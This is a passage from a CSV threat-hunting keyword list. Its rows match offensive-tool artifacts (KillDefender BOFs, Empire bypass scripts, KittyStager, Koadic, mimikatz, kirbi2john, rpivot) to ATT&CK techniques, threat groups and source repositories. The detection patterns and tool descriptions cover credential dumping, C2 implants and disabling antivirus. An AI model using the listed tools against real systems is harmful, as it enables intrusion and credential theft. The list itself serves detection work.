- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*KillDefender.h*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a 
Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*KillDefender.x64*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*KillDefender.x64.*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*KillDefender_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" 
+"*killdefender_bof*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*KillDefenderBOF-main*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*Killed running eventvwr*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Killed running sdclt*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kill-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*killprocess.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*kimi_MDPC/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*kindloader.exe* --extract kindlocker*","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","4","6","N/A","N/A","N/A","N/A" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kirbi_to_hashcat.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" +"*kirbi2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 
Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*kirbikator.exe*","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","10","1277","216","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z" +"*kite03/echoac-poc*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*kitrap0d.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitrap0d_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten/basicKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten_test.go*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kittens/bananaKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kittielocal -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*KittyStager -*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ?*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ??*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager.git*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/cmd*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/internal*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/kitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kiwi Legit Printer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*klezVirus/CheeseTools*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*klezVirus/inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*klezVirus/SilentMoonwalk*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z"
+"*klnkiajpmpkkkgpgbogmcgfjhdoljacg*","greyware_tool_keyword","Free VPN for Chrome","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*klsecservices*","offensive_tool_keyword","Github Username","exploitation tools for attackers","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/klsecservices","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*klsecservices/rpivot*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
+"*knajdeaocbpmfghhmijicidfcmdgbdpm*","greyware_tool_keyword","Guru VPN & Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*knmmpciebaoojcpjjoeonlcjacjopcpf*","greyware_tool_keyword","Thunder Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*known_hosts2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*Koadic.persist*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*koadic_load.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript).
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*koadic_net.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*koadic_process.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript).
